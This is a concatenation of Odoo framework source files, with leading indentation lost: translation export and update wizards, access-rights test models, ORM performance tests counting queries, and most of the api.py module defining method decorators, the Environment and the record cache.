import base64
import contextlib
import io
from odoo import api, fields, models, tools, _
NEW_LANG_KEY = '__new__'
class BaseLanguageExport(models.TransientModel):
_name = "base.language.export"
_description = 'Language Export'
@api.model
def _get_languages(self):
langs = self.env['res.lang'].search([('translatable', '=', True)])
return [(NEW_LANG_KEY, _('New Language (Empty translation template)'))] + \
[(lang.code, lang.name) for lang in langs]
name = fields.Char('File Name', readonly=True)
lang = fields.Selection(_get_languages, string='Language', required=True, default=NEW_LANG_KEY)
format = fields.Selection([('csv','CSV File'), ('po','PO File'), ('tgz', 'TGZ Archive')],
string='File Format', required=True, default='csv')
modules = fields.Many2many('ir.module.module', 'rel_modules_langexport', 'wiz_id', 'module_id',
string='Apps To Export', domain=[('state','=','installed')])
data = fields.Binary('File', readonly=True)
state = fields.Selection([('choose', 'choose'), ('get', 'get')], # choose language or get the file
default='choose')
@api.multi
def act_getfile(self):
this = self[0]
lang = this.lang if this.lang != NEW_LANG_KEY else False
mods = sorted(this.mapped('modules.name')) or ['all']
with contextlib.closing(io.BytesIO()) as buf:
tools.trans_export(lang, mods, buf, this.format, self._cr)
out = base64.encodestring(buf.getvalue())
filename = 'new'
if lang:
filename = tools.get_iso_codes(lang)
elif len(mods) == 1:
filename = mods[0]
extension = this.format
if not lang and extension == 'po':
extension = 'pot'
name = "%s.%s" % (filename, extension)
this.write({'state': 'get', 'data': out, 'name': name})
return {
'type': 'ir.actions.act_window',
'res_model': 'base.language.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
```
#### File: base/wizard/base_update_translations.py
```python
import tempfile
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
class BaseUpdateTranslations(models.TransientModel):
_name = 'base.update.translations'
_description = 'Update Translations'
@api.model
def _get_languages(self):
langs = self.env['res.lang'].search([('active', '=', True), ('translatable', '=', True)])
return [(lang.code, lang.name) for lang in langs]
lang = fields.Selection(_get_languages, 'Language', required=True)
@api.model
def _get_lang_name(self, lang_code):
lang = self.env['res.lang'].search([('code', '=', lang_code)], limit=1)
if not lang:
raise UserError(_('No language with code "%s" exists') % lang_code)
return lang.name
@api.multi
def act_update(self):
this = self[0]
lang_name = self._get_lang_name(this.lang)
with tempfile.NamedTemporaryFile() as buf:
tools.trans_export(this.lang, ['all'], buf, 'po', self._cr)
context = {'create_empty_translation': True}
tools.trans_load_data(self._cr, buf, 'po', this.lang, lang_name=lang_name, context=context)
return {'type': 'ir.actions.act_window_close'}
```
#### File: addons/test_access_rights/models.py
```python
from odoo import fields, models
class SomeObj(models.Model):
_name = 'test_access_right.some_obj'
_description = 'Object For Test Access Right'
val = fields.Integer()
categ_id = fields.Many2one('test_access_right.obj_categ')
class Container(models.Model):
_name = 'test_access_right.container'
_description = 'Test Access Right Container'
some_ids = fields.Many2many('test_access_right.some_obj', 'test_access_right_rel', 'container_id', 'some_id')
class ObjCateg(models.Model):
_name = 'test_access_right.obj_categ'
_description = "Context dependent searchable model"
name = fields.Char(required=True)
def search(self, args, **kwargs):
if self.env.context.get('only_media'):
args += [('name', '=', 'Media')]
return super(ObjCateg, self).search(args, **kwargs)
```
#### File: test_performance/tests/test_performance.py
```python
from collections import defaultdict
import json
from odoo.tests.common import TransactionCase, users, warmup
from odoo.tools import pycompat
class TestPerformance(TransactionCase):
@users('__system__', 'demo')
@warmup
def test_read_base(self):
""" Read records. """
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=3, demo=3):
# without cache
for record in records:
record.partner_id.country_id.name
with self.assertQueryCount(0):
# with cache
for record in records:
record.partner_id.country_id.name
with self.assertQueryCount(0):
# value_pc must have been prefetched, too
for record in records:
record.value_pc
@users('__system__', 'demo')
@warmup
def test_write_base(self):
""" Write records (no recomputation). """
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=1, demo=1):
records.write({'name': 'X'})
@users('__system__', 'demo')
@warmup
def test_write_base_with_recomputation(self):
""" Write records (with recomputation). """
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=3, demo=3):
records.write({'value': 42})
@users('__system__', 'demo')
@warmup
def test_create_base(self):
""" Create records. """
with self.assertQueryCount(__system__=6, demo=6):
self.env['test_performance.base'].create({'name': 'X'})
@users('__system__', 'demo')
@warmup
def test_create_base_with_lines(self):
""" Create records with one2many lines. """
with self.assertQueryCount(__system__=20, demo=20):
self.env['test_performance.base'].create({
'name': 'X',
'line_ids': [(0, 0, {'value': val}) for val in range(10)],
})
@users('__system__', 'demo')
@warmup
def test_create_base_with_tags(self):
""" Create records with many2many tags. """
with self.assertQueryCount(__system__=17, demo=17):
self.env['test_performance.base'].create({
'name': 'X',
'tag_ids': [(0, 0, {'name': val}) for val in range(10)],
})
@users('__system__', 'demo')
@warmup
def test_several_prefetch(self):
initial_records = self.env['test_performance.base'].search([])
self.assertEqual(len(initial_records), 5)
for _i in range(8):
self.env.cr.execute(
'insert into test_performance_base(value) select value from test_performance_base'
)
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 1280)
# should only cause 2 queries thanks to prefetching
with self.assertQueryCount(__system__=2, demo=2):
records.mapped('value')
records.invalidate_cache(['value'])
with self.assertQueryCount(__system__=2, demo=2):
with self.env.do_in_onchange():
records.mapped('value')
self.env.cr.execute(
'delete from test_performance_base where id not in %s',
(tuple(initial_records.ids),)
)
def expected_read_group(self):
groups = defaultdict(list)
for record in self.env['test_performance.base'].search([]):
groups[record.partner_id.id].append(record.value)
partners = self.env['res.partner'].search([('id', 'in', list(groups))])
return [{
'__domain': [('partner_id', '=', partner.id)],
'partner_id': (partner.id, partner.display_name),
'partner_id_count': len(groups[partner.id]),
'value': sum(groups[partner.id]),
} for partner in partners]
@users('__system__', 'demo')
def test_read_group_with_name_get(self):
model = self.env['test_performance.base']
expected = self.expected_read_group()
# use read_group and check the expected result
with self.assertQueryCount(__system__=2, demo=2):
model.invalidate_cache()
result = model.read_group([], ['partner_id', 'value'], ['partner_id'])
self.assertEqual(result, expected)
@users('__system__', 'demo')
def test_read_group_without_name_get(self):
model = self.env['test_performance.base']
expected = self.expected_read_group()
# use read_group and check the expected result
with self.assertQueryCount(__system__=1, demo=1):
model.invalidate_cache()
result = model.read_group([], ['partner_id', 'value'], ['partner_id'])
self.assertEqual(len(result), len(expected))
for res, exp in pycompat.izip(result, expected):
self.assertEqual(res['__domain'], exp['__domain'])
self.assertEqual(res['partner_id'][0], exp['partner_id'][0])
self.assertEqual(res['partner_id_count'], exp['partner_id_count'])
self.assertEqual(res['value'], exp['value'])
# now serialize to json, which should force evaluation
with self.assertQueryCount(__system__=1, demo=1):
json.dumps(result)
```
#### File: odoo/odoo/api.py
```python
__all__ = [
'Environment',
'Meta', 'guess', 'noguess',
'model', 'multi', 'one',
'model_cr', 'model_cr_context',
'cr', 'cr_context',
'cr_uid', 'cr_uid_context',
'cr_uid_id', 'cr_uid_id_context',
'cr_uid_ids', 'cr_uid_ids_context',
'cr_uid_records', 'cr_uid_records_context',
'constrains', 'depends', 'onchange', 'returns',
'call_kw',
]
import logging
from collections import defaultdict, Mapping
from contextlib import contextmanager
from inspect import currentframe, getargspec
from pprint import pformat
from weakref import WeakSet
from decorator import decorate, decorator
from werkzeug.local import Local, release_local
from odoo.tools import frozendict, classproperty, StackMap, pycompat
from odoo.exceptions import CacheMiss
_logger = logging.getLogger(__name__)
# The following attributes are used, and reflected on wrapping methods:
# - method._constrains: set by @constrains, specifies constraint dependencies
# - method._depends: set by @depends, specifies compute dependencies
# - method._returns: set by @returns, specifies return model
# - method._onchange: set by @onchange, specifies onchange fields
# - method.clear_cache: set by @ormcache, used to clear the cache
#
# On wrapping method only:
# - method._api: decorator function, used for re-applying decorator
# - method._orig: original method
#
WRAPPED_ATTRS = ('__module__', '__name__', '__doc__', '_constrains',
'_depends', '_onchange', '_returns', 'clear_cache')
INHERITED_ATTRS = ('_returns',)
class Params(object):
def __init__(self, args, kwargs):
self.args = args
self.kwargs = kwargs
def __str__(self):
params = []
for arg in self.args:
params.append(repr(arg))
for item in sorted(self.kwargs.items()):
params.append("%s=%r" % item)
return ', '.join(params)
class Meta(type):
""" Metaclass that automatically decorates traditional-style methods by
guessing their API. It also implements the inheritance of the
:func:`returns` decorators.
"""
def __new__(meta, name, bases, attrs):
# dummy parent class to catch overridden methods decorated with 'returns'
parent = type.__new__(meta, name, bases, {})
for key, value in list(attrs.items()):
if not key.startswith('__') and callable(value):
# make the method inherit from decorators
value = propagate(getattr(parent, key, None), value)
# guess calling convention if none is given
if not hasattr(value, '_api'):
try:
value = guess(value)
except TypeError:
pass
if (getattr(value, '_api', None) or '').startswith('cr'):
_logger.warning("Deprecated method %s.%s in module %s", name, key, attrs.get('__module__'))
attrs[key] = value
return type.__new__(meta, name, bases, attrs)
def attrsetter(attr, value):
""" Return a function that sets ``attr`` on its argument and returns it. """
return lambda method: setattr(method, attr, value) or method
def propagate(method1, method2):
""" Propagate decorators from ``method1`` to ``method2``, and return the
resulting method.
"""
if method1:
for attr in INHERITED_ATTRS:
if hasattr(method1, attr) and not hasattr(method2, attr):
setattr(method2, attr, getattr(method1, attr))
return method2
def constrains(*args):
""" Decorates a constraint checker. Each argument must be a field name
used in the check::
@api.one
@api.constrains('name', 'description')
def _check_description(self):
if self.name == self.description:
raise ValidationError("Fields name and description must be different")
Invoked on the records on which one of the named fields has been modified.
Should raise :class:`~odoo.exceptions.ValidationError` if the
validation failed.
.. warning::
``@constrains`` only supports simple field names, dotted names
(fields of relational fields e.g. ``partner_id.customer``) are not
supported and will be ignored
``@constrains`` will be triggered only if the declared fields in the
decorated method are included in the ``create`` or ``write`` call.
It implies that fields not present in a view will not trigger a call
during a record creation. A override of ``create`` is necessary to make
sure a constraint will always be triggered (e.g. to test the absence of
value).
"""
return attrsetter('_constrains', args)
def onchange(*args):
""" Return a decorator to decorate an onchange method for given fields.
Each argument must be a field name::
@api.onchange('partner_id')
def _onchange_partner(self):
self.message = "Dear %s" % (self.partner_id.name or "")
In the form views where the field appears, the method will be called
when one of the given fields is modified. The method is invoked on a
pseudo-record that contains the values present in the form. Field
assignments on that record are automatically sent back to the client.
The method may return a dictionary for changing field domains and pop up
a warning message, like in the old API::
return {
'domain': {'other_id': [('partner_id', '=', partner_id)]},
'warning': {'title': "Warning", 'message': "What is this?"},
}
.. danger::
Since ``@onchange`` returns a recordset of pseudo-records,
calling any one of the CRUD methods
(:meth:`create`, :meth:`read`, :meth:`write`, :meth:`unlink`)
on the aforementioned recordset is undefined behaviour,
as they potentially do not exist in the database yet.
Instead, simply set the record's field like shown in the example
above or call the :meth:`update` method.
.. warning::
``@onchange`` only supports simple field names, dotted names
(fields of relational fields e.g. ``partner_id.tz``) are not
supported and will be ignored
"""
return attrsetter('_onchange', args)
def depends(*args):
""" Return a decorator that specifies the field dependencies of a "compute"
method (for new-style function fields). Each argument must be a string
that consists in a dot-separated sequence of field names::
pname = fields.Char(compute='_compute_pname')
@api.one
@api.depends('partner_id.name', 'partner_id.is_company')
def _compute_pname(self):
if self.partner_id.is_company:
self.pname = (self.partner_id.name or "").upper()
else:
self.pname = self.partner_id.name
One may also pass a single function as argument. In that case, the
dependencies are given by calling the function with the field's model.
"""
if args and callable(args[0]):
args = args[0]
elif any('id' in arg.split('.') for arg in args):
raise NotImplementedError("Compute method cannot depend on field 'id'.")
return attrsetter('_depends', args)
def returns(model, downgrade=None, upgrade=None):
""" Return a decorator for methods that return instances of ``model``.
:param model: a model name, or ``'self'`` for the current model
:param downgrade: a function ``downgrade(self, value, *args, **kwargs)``
to convert the record-style ``value`` to a traditional-style output
:param upgrade: a function ``upgrade(self, value, *args, **kwargs)``
to convert the traditional-style ``value`` to a record-style output
The arguments ``self``, ``*args`` and ``**kwargs`` are the ones passed
to the method in the record-style.
The decorator adapts the method output to the api style: ``id``, ``ids`` or
``False`` for the traditional style, and recordset for the record style::
@model
@returns('res.partner')
def find_partner(self, arg):
... # return some record
# output depends on call style: traditional vs record style
partner_id = model.find_partner(cr, uid, arg, context=context)
# recs = model.browse(cr, uid, ids, context)
partner_record = recs.find_partner(arg)
Note that the decorated method must satisfy that convention.
Those decorators are automatically *inherited*: a method that overrides
a decorated existing method will be decorated with the same
``@returns(model)``.
"""
return attrsetter('_returns', (model, downgrade, upgrade))
def downgrade(method, value, self, args, kwargs):
""" Convert ``value`` returned by ``method`` on ``self`` to traditional style. """
spec = getattr(method, '_returns', None)
if not spec:
return value
_, convert, _ = spec
if convert and len(getargspec(convert).args) > 1:
return convert(self, value, *args, **kwargs)
elif convert:
return convert(value)
else:
return value.ids
def aggregate(method, value, self):
""" Aggregate record-style ``value`` for a method decorated with ``@one``. """
spec = getattr(method, '_returns', None)
if spec:
# value is a list of instances, concatenate them
model, _, _ = spec
if model == 'self':
return sum(value, self.browse())
elif model:
return sum(value, self.env[model])
return value
def split_context(method, args, kwargs):
""" Extract the context from a pair of positional and keyword arguments.
Return a triple ``context, args, kwargs``.
"""
pos = len(getargspec(method).args) - 1
if pos < len(args):
return args[pos], args[:pos], kwargs
else:
return kwargs.pop('context', None), args, kwargs
def model(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents is not relevant, only the model is. Such a method::
@api.model
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, args, context=context)
Notice that no ``ids`` are passed to the method in the traditional style.
"""
if method.__name__ == 'create':
return model_create_single(method)
method._api = 'model'
return method
def multi(method):
""" Decorate a record-style method where ``self`` is a recordset. The method
typically defines an operation on records. Such a method::
@api.multi
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, ids, args, context=context)
"""
method._api = 'multi'
return method
def one(method):
""" Decorate a record-style method where ``self`` is expected to be a
singleton instance. The decorated method automatically loops on records,
and makes a list with the results. In case the method is decorated with
:func:`returns`, it concatenates the resulting instances. Such a
method::
@api.one
def method(self, args):
return self.name
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
names = recs.method(args)
names = model.method(cr, uid, ids, args, context=context)
.. deprecated:: 9.0
:func:`~.one` often makes the code less clear and behaves in ways
developers and readers may not expect.
It is strongly recommended to use :func:`~.multi` and either
iterate on the ``self`` recordset or ensure that the recordset
is a single record with :meth:`~odoo.models.Model.ensure_one`.
"""
def loop(method, self, *args, **kwargs):
result = [method(rec, *args, **kwargs) for rec in self]
return aggregate(method, result, self)
wrapper = decorator(loop, method)
wrapper._api = 'one'
return wrapper
def model_cr(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents is not relevant, only the model is. Such a method::
@api.model_cr
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args)
Notice that no ``uid``, ``ids``, ``context`` are passed to the method in
the traditional style.
"""
method._api = 'model_cr'
return method
def model_cr_context(method):
""" Decorate a record-style method where ``self`` is a recordset, but its
contents is not relevant, only the model is. Such a method::
@api.model_cr_context
def method(self, args):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args, context=context)
Notice that no ``uid``, ``ids`` are passed to the method in the
traditional style.
"""
method._api = 'model_cr_context'
return method
_create_logger = logging.getLogger(__name__ + '.create')
def _model_create_single(create, self, arg):
# 'create' expects a dict and returns a record
if isinstance(arg, Mapping):
return create(self, arg)
if len(arg) > 1:
_create_logger.debug("%s.create() called with %d dicts", self, len(arg))
return self.browse().concat(*(create(self, vals) for vals in arg))
def model_create_single(method):
""" Decorate a method that takes a dictionary and creates a single record.
The method may be called with either a single dict or a list of dicts::
record = model.create(vals)
records = model.create([vals, ...])
"""
wrapper = decorate(method, _model_create_single)
wrapper._api = 'model_create'
return wrapper
def _model_create_multi(create, self, arg):
# 'create' expects a list of dicts and returns a recordset
if isinstance(arg, Mapping):
return create(self, [arg])
return create(self, arg)
def model_create_multi(method):
""" Decorate a method that takes a list of dictionaries and creates multiple
records. The method may be called with either a single dict or a list of
dicts::
record = model.create(vals)
records = model.create([vals, ...])
"""
wrapper = decorate(method, _model_create_multi)
wrapper._api = 'model_create'
return wrapper
def cr(method):
""" Decorate a traditional-style method that takes ``cr`` as a parameter.
Such a method may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, args)
"""
method._api = 'cr'
return method
def cr_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``context`` as parameters. """
method._api = 'cr_context'
return method
def cr_uid(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid`` as parameters. """
method._api = 'cr_uid'
return method
def cr_uid_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``context`` as
parameters. Such a method may be called in both record and traditional
styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, args, context=context)
"""
method._api = 'cr_uid_context'
return method
def cr_uid_id(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``id`` as
parameters. Such a method may be called in both record and traditional
styles. In the record style, the method automatically loops on records.
"""
method._api = 'cr_uid_id'
return method
def cr_uid_id_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``id``,
``context`` as parameters. Such a method::
@api.cr_uid_id
def method(self, cr, uid, id, args, context=None):
...
may be called in both record and traditional styles, like::
# rec = model.browse(cr, uid, id, context)
rec.method(args)
model.method(cr, uid, id, args, context=context)
"""
method._api = 'cr_uid_id_context'
return method
def cr_uid_ids(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``ids`` as
parameters. Such a method may be called in both record and traditional
styles.
"""
method._api = 'cr_uid_ids'
return method
def cr_uid_ids_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, ``ids``,
``context`` as parameters. Such a method::
@api.cr_uid_ids_context
def method(self, cr, uid, ids, args, context=None):
...
may be called in both record and traditional styles, like::
# recs = model.browse(cr, uid, ids, context)
recs.method(args)
model.method(cr, uid, ids, args, context=context)
It is generally not necessary, see :func:`guess`.
"""
method._api = 'cr_uid_ids_context'
return method
def cr_uid_records(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, a
recordset of model ``self`` as parameters. Such a method::
@api.cr_uid_records
def method(self, cr, uid, records, args):
...
may be called in both record and traditional styles, like::
# records = model.browse(cr, uid, ids, context)
records.method(args)
model.method(cr, uid, records, args)
"""
method._api = 'cr_uid_records'
return method
def cr_uid_records_context(method):
""" Decorate a traditional-style method that takes ``cr``, ``uid``, a
recordset of model ``self``, ``context`` as parameters. Such a method::
@api.cr_uid_records_context
def method(self, cr, uid, records, args, context=None):
...
may be called in both record and traditional styles, like::
# records = model.browse(cr, uid, ids, context)
records.method(args)
model.method(cr, uid, records, args, context=context)
"""
method._api = 'cr_uid_records_context'
return method
def v7(method_v7):
""" Decorate a method that supports the old-style api only. A new-style api
may be provided by redefining a method with the same name and decorated
with :func:`~.v8`::
@api.v7
def foo(self, cr, uid, ids, context=None):
...
@api.v8
def foo(self):
...
Special care must be taken if one method calls the other one, because
the method may be overridden! In that case, one should call the method
from the current class (say ``MyClass``), for instance::
@api.v7
def foo(self, cr, uid, ids, context=None):
# Beware: records.foo() may call an overriding of foo()
records = self.browse(cr, uid, ids, context)
return MyClass.foo(records)
Note that the wrapper method uses the docstring of the first method.
"""
# retrieve method_v8 from the caller's frame
frame = currentframe().f_back
return frame.f_locals.get(method_v7.__name__, method_v7)
def v8(method_v8):
""" Decorate a method that supports the new-style api only. An old-style api
may be provided by redefining a method with the same name and decorated
with :func:`~.v7`::
@api.v8
def foo(self):
...
@api.v7
def foo(self, cr, uid, ids, context=None):
...
Note that the wrapper method uses the docstring of the first method.
"""
if method_v8.__name__ == 'read':
return multi(method_v8)
method_v8._api = 'v8'
return method_v8
def noguess(method):
""" Decorate a method to prevent any effect from :func:`guess`. """
method._api = None
return method
def guess(method):
""" Decorate ``method`` to make it callable in both traditional and record
styles. This decorator is applied automatically by the model's
metaclass, and has no effect on already-decorated methods.
The API style is determined by heuristics on the parameter names: ``cr``
or ``cursor`` for the cursor, ``uid`` or ``user`` for the user id,
``id`` or ``ids`` for a list of record ids, and ``context`` for the
context dictionary. If a traditional API is recognized, one of the
decorators :func:`cr`, :func:`cr_context`, :func:`cr_uid`,
:func:`cr_uid_context`, :func:`cr_uid_id`, :func:`cr_uid_id_context`,
:func:`cr_uid_ids`, :func:`cr_uid_ids_context` is applied on the method.
Method calls are considered traditional style when their first parameter
is a database cursor.
"""
if hasattr(method, '_api'):
return method
# introspection on argument names to determine api style
args, vname, kwname, defaults = getargspec(method)
names = tuple(args) + (None,) * 4
if names[0] == 'self':
if names[1] in ('cr', 'cursor'):
if names[2] in ('uid', 'user'):
if names[3] == 'ids':
if 'context' in names or kwname:
return cr_uid_ids_context(method)
else:
return cr_uid_ids(method)
elif names[3] == 'id' or names[3] == 'res_id':
if 'context' in names or kwname:
return cr_uid_id_context(method)
else:
return cr_uid_id(method)
elif 'context' in names or kwname:
return cr_uid_context(method)
else:
return cr_uid(method)
elif 'context' in names:
return cr_context(method)
else:
return cr(method)
# no wrapping by default
return noguess(method)
def expected(decorator, func):
""" Decorate ``func`` with ``decorator`` if ``func`` is not wrapped yet. """
return decorator(func) if not hasattr(func, '_api') else func
def _call_kw_model(method, self, args, kwargs):
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {})
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return downgrade(method, result, recs, args, kwargs)
def _call_kw_model_create(method, self, args, kwargs):
# special case for method 'create'
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {})
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return result.id if isinstance(args[0], Mapping) else result.ids
def _call_kw_multi(method, self, args, kwargs):
ids, args = args[0], args[1:]
context, args, kwargs = split_context(method, args, kwargs)
recs = self.with_context(context or {}).browse(ids)
_logger.debug("call %s.%s(%s)", recs, method.__name__, Params(args, kwargs))
result = method(recs, *args, **kwargs)
return downgrade(method, result, recs, args, kwargs)
def call_kw(model, name, args, kwargs):
""" Invoke the given method ``name`` on the recordset ``model``. """
method = getattr(type(model), name)
api = getattr(method, '_api', None)
if api == 'model':
return _call_kw_model(method, model, args, kwargs)
elif api == 'model_create':
return _call_kw_model_create(method, model, args, kwargs)
else:
return _call_kw_multi(method, model, args, kwargs)
class Environment(Mapping):
""" An environment wraps data for ORM records:
- :attr:`cr`, the current database cursor;
- :attr:`uid`, the current user id;
- :attr:`context`, the current context dictionary.
It provides access to the registry by implementing a mapping from model
names to new api models. It also holds a cache for records, and a data
structure to manage recomputations.
"""
_local = Local()
@classproperty
def envs(cls):
return cls._local.environments
@classmethod
@contextmanager
def manage(cls):
""" Context manager for a set of environments. """
if hasattr(cls._local, 'environments'):
yield
else:
try:
cls._local.environments = Environments()
yield
finally:
release_local(cls._local)
@classmethod
def reset(cls):
""" Clear the set of environments.
This may be useful when recreating a registry inside a transaction.
"""
cls._local.environments = Environments()
def __new__(cls, cr, uid, context):
assert context is not None
args = (cr, uid, context)
# if env already exists, return it
env, envs = None, cls.envs
for env in envs:
if env.args == args:
return env
# otherwise create environment, and add it in the set
self = object.__new__(cls)
self.cr, self.uid, self.context = self.args = (cr, uid, frozendict(context))
self.registry = Registry(cr.dbname)
self.cache = envs.cache
self._cache_key = (cr, uid)
self._protected = StackMap() # {field: ids, ...}
self.dirty = defaultdict(set) # {record: set(field_name), ...}
self.all = envs
envs.add(self)
return self
#
# Mapping methods
#
def __contains__(self, model_name):
""" Test whether the given model exists. """
return model_name in self.registry
def __getitem__(self, model_name):
""" Return an empty recordset from the given model. """
return self.registry[model_name]._browse((), self)
def __iter__(self):
""" Return an iterator on model names. """
return iter(self.registry)
def __len__(self):
""" Return the size of the model registry. """
return len(self.registry)
def __eq__(self, other):
return self is other
def __ne__(self, other):
return self is not other
def __hash__(self):
return object.__hash__(self)
def __call__(self, cr=None, user=None, context=None):
""" Return an environment based on ``self`` with modified parameters.
:param cr: optional database cursor to change the current cursor
:param user: optional user/user id to change the current user
:param context: optional context dictionary to change the current context
"""
cr = self.cr if cr is None else cr
uid = self.uid if user is None else int(user)
context = self.context if context is None else context
return Environment(cr, uid, context)
def ref(self, xml_id, raise_if_not_found=True):
""" return the record corresponding to the given ``xml_id`` """
return self['ir.model.data'].xmlid_to_object(xml_id, raise_if_not_found=raise_if_not_found)
@property
def user(self):
""" return the current user (as an instance) """
return self(user=SUPERUSER_ID)['res.users'].browse(self.uid)
@property
def lang(self):
""" return the current language code """
return self.context.get('lang')
@contextmanager
def _do_in_mode(self, mode):
if self.all.mode:
yield
else:
try:
self.all.mode = mode
yield
finally:
self.all.mode = False
self.dirty.clear()
def do_in_draft(self):
""" Context-switch to draft mode, where all field updates are done in
cache only.
"""
return self._do_in_mode(True)
@property
def in_draft(self):
""" Return whether we are in draft mode. """
return bool(self.all.mode)
def do_in_onchange(self):
""" Context-switch to 'onchange' draft mode, which is a specialized
draft mode used during execution of onchange methods.
"""
return self._do_in_mode('onchange')
@property
def in_onchange(self):
""" Return whether we are in 'onchange' draft mode. """
return self.all.mode == 'onchange'
def clear(self):
""" Clear all record caches, and discard all fields to recompute.
This may be useful when recovering from a failed ORM operation.
"""
self.cache.invalidate()
self.all.todo.clear()
@contextmanager
def clear_upon_failure(self):
""" Context manager that clears the environments (caches and fields to
recompute) upon exception.
"""
try:
yield
except Exception:
self.clear()
raise
def protected(self, field):
""" Return the recordset for which ``field`` should not be invalidated or recomputed. """
return self[field.model_name].browse(self._protected.get(field, ()))
@contextmanager
def protecting(self, what, records=None):
""" Prevent the invalidation or recomputation of fields on records.
The parameters are either:
- ``what`` a collection of fields and ``records`` a recordset, or
- ``what`` a collection of pairs ``(fields, records)``.
"""
protected = self._protected
try:
protected.pushmap()
what = what if records is None else [(what, records)]
for fields, records in what:
for field in fields:
ids = protected.get(field, frozenset())
protected[field] = ids.union(records._ids)
yield
finally:
protected.popmap()
def field_todo(self, field):
""" Return a recordset with all records to recompute for ``field``. """
ids = {rid for recs in self.all.todo.get(field, ()) for rid in recs.ids}
return self[field.model_name].browse(ids)
def check_todo(self, field, record):
""" Check whether ``field`` must be recomputed on ``record``, and if so,
return the corresponding recordset to recompute.
"""
for recs in self.all.todo.get(field, []):
if recs & record:
return recs
def add_todo(self, field, records):
""" Mark ``field`` to be recomputed on ``records``. """
recs_list = self.all.todo.setdefault(field, [])
for i, recs in enumerate(recs_list):
if recs.env == records.env:
# only add records if not already in the recordset, much much
# cheaper in case recs is big and records is a singleton
# already present
if not records <= recs:
recs_list[i] |= records
break
else:
recs_list.append(records)
def remove_todo(self, field, records):
""" Mark ``field`` as recomputed on ``records``. """
recs_list = [recs - records for recs in self.all.todo.pop(field, [])]
recs_list = [r for r in recs_list if r]
if recs_list:
self.all.todo[field] = recs_list
def has_todo(self):
""" Return whether some fields must be recomputed. """
return bool(self.all.todo)
def get_todo(self):
""" Return a pair ``(field, records)`` to recompute.
The field is such that none of its dependencies must be recomputed.
"""
field = min(self.all.todo, key=self.registry.field_sequence)
return field, self.all.todo[field][0]
@property
def recompute(self):
return self.all.recompute
@contextmanager
def norecompute(self):
tmp = self.all.recompute
self.all.recompute = False
try:
yield
finally:
self.all.recompute = tmp
def cache_key(self, field):
""" Return the key to store the value of ``field`` in cache, the full
cache key being ``(key, field, record.id)``.
"""
return self if field.context_dependent else self._cache_key
class Environments(object):
""" A common object for all environments in a request. """
def __init__(self):
self.envs = WeakSet() # weak set of environments
self.cache = Cache() # cache for all records
self.todo = {} # recomputations {field: [records]}
self.mode = False # flag for draft/onchange
self.recompute = True
def add(self, env):
""" Add the environment ``env``. """
self.envs.add(env)
def __iter__(self):
""" Iterate over environments. """
return iter(self.envs)
class Cache(object):
""" Implementation of the cache of records. """
def __init__(self):
# {key: {field: {record_id: value}}}
self._data = defaultdict(lambda: defaultdict(dict))
def contains(self, record, field):
""" Return whether ``record`` has a value for ``field``. """
key = record.env.cache_key(field)
return record.id in self._data[key].get(field, ())
def get(self, record, field):
""" Return the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
try:
value = self._data[key][field][record._ids[0]]
except KeyError:
raise CacheMiss(record, field)
return value.get() if isinstance(value, SpecialValue) else value
def set(self, record, field, value):
""" Set the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
self._data[key][field][record._ids[0]] = value
def update(self, records, field, values):
""" Set the values of ``field`` for several ``records``. """
key = records.env.cache_key(field)
self._data[key][field].update(pycompat.izip(records._ids, values))
def remove(self, record, field):
""" Remove the value of ``field`` for ``record``. """
key = record.env.cache_key(field)
del self._data[key][field][record.id]
def contains_value(self, record, field):
""" Return whether ``record`` has a regular value for ``field``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id, SpecialValue(None))
return not isinstance(value, SpecialValue)
def get_value(self, record, field, default=None):
""" Return the regular value of ``field`` for ``record``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id, SpecialValue(None))
return default if isinstance(value, SpecialValue) else value
def get_special(self, record, field, default=None):
""" Return the special value of ``field`` for ``record``. """
key = record.env.cache_key(field)
value = self._data[key][field].get(record.id)
return value.get if isinstance(value, SpecialValue) else default
def set_special(self, record, field, getter):
""" Set the value of ``field`` for ``record`` to return ``getter()``. """
key = record.env.cache_key(field)
self._data[key][field][record.id] = SpecialValue(getter)
def set_failed(self, records, fields, exception):
""" Mark ``fields`` on ``records`` with the given exception. """
def getter():
raise exception
for field in fields:
for record in records:
self.set_special(record, field, getter)
